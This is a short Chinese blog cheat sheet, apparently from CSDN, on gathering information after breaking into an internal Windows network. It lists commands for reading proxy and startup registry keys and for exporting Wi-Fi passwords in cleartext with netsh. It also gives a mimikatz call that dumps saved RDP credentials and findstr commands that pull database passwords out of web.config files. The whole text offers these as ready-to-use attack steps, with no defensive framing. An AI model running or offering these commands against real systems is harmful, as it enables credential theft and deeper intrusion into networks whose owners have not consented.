内网渗透信息收集
内网渗透-注册表信息搜集
Powershell注册表搜集
https://github.com/3gstudent/ListInstalledPrograms
获取系统代理:
reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
获取启动项
reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
获取wifi密码
netsh wlan export profile interface=WLAN(看实际情况) key=clear folder=C:\
mimikatz导出RDP密码
mimikatz 的 dpapi::cred
在根目录运行
dir /b /s web.config >> tmps.logs
根据上面已知的数据库连接账号密码字段名,我们就可以直接利用 findstr 在指定的 web 目录下批量抓取 sa 密码
findstr /c:"User Id=" /c:"Password=" /si web.config >> C:/inetpub/tmps.logs
版权声明:本文为0xd3ac原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。